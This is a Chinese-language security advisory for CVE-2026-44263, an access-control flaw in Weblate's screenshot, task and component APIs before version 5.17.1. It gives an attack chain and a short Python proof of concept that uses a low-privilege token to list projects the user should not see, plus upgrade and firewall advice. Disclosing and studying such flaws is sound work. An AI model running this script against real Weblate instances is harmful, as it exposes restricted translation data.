IPBUF安全漏洞报告
English
CVE-2026-44263 CVSS 4.3 中危

CVE-2026-44263 Weblate API信息泄露漏洞

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-44263
漏洞类型
信息泄露
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Weblate

相关标签

信息泄露权限绕过WeblateAPI安全CVE-2026-44263

漏洞概述

Weblate是一个基于Web的本地化工具。在5.17.1版本之前,其截图、任务和组件链接API存在安全漏洞。攻击者只需拥有低权限账号,即可利用该漏洞枚举出其无权访问的项目中的翻译信息。该漏洞可能导致敏感信息泄露,厂商已在5.17.1版本中修复了此问题。

技术细节

该漏洞的核心在于Weblate的API权限控制逻辑存在缺陷。在受影响的版本中(< 5.17.1),处理截图、组件列表和任务列表的API接口未能正确验证当前用户对目标项目的访问权限。攻击者利用一个具有合法身份但权限较低(PR:L)的账号,通过向受影响的API端点(如/api/components/)发送HTTP GET请求,可以触发系统返回包含受限项目翻译数据的响应。这种利用方式属于不安全的直接对象引用(IDOR)或越权访问。由于攻击是通过网络进行的(AV:N),且无需用户交互(UI:N),攻击者可以自动化地批量扫描并收集敏感的翻译数据,导致机密性受损(C:L),但不会影响系统的完整性或可用性。

攻击链分析

STEP 1
1
攻击者侦察目标网络,发现存在Weblate服务实例。
STEP 2
2
攻击者在Weblate上注册一个普通账号或获取一个低权限账号。
STEP 3
3
攻击者使用低权限账号的API Token,向/api/components/、/api/screenshots/等端点发送请求。
STEP 4
4
由于漏洞存在,服务器返回了包含受限项目翻译信息的列表,攻击者解析响应获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target Weblate instance URL target_url = "https://target-weblate-instance.com/api/" # Low privilege user token auth_token = "LOW_PRIVILEGE_USER_TOKEN" headers = { "Authorization": f"Token {auth_token}", "Content-Type": "application/json" } # Exploit: Accessing components API to enumerate inaccessible projects # Vulnerable endpoints may include /api/screenshots/, /api/tasks/, /api/components/ endpoint = "components/" try: response = requests.get(f"{target_url}{endpoint}", headers=headers) if response.status_code == 200: data = response.json() print("[+] Successfully retrieved data via API.") print("[+] Dumping potentially sensitive project/translation info:") # Check results for items that should not be accessible for item in data.get('results', []): project_name = item.get('project', {}).get('name', 'Unknown') component_name = item.get('name', 'Unknown') print(f"Project: {project_name} | Component: {component_name}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Weblate < 5.17.1

防御指南

临时缓解措施
如果暂时无法升级,建议通过Web应用防火墙(WAF)限制对特定API端点(如/api/components/)的访问,仅允许受信任的IP或管理员角色调用,或暂时禁用相关API功能直至补丁应用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。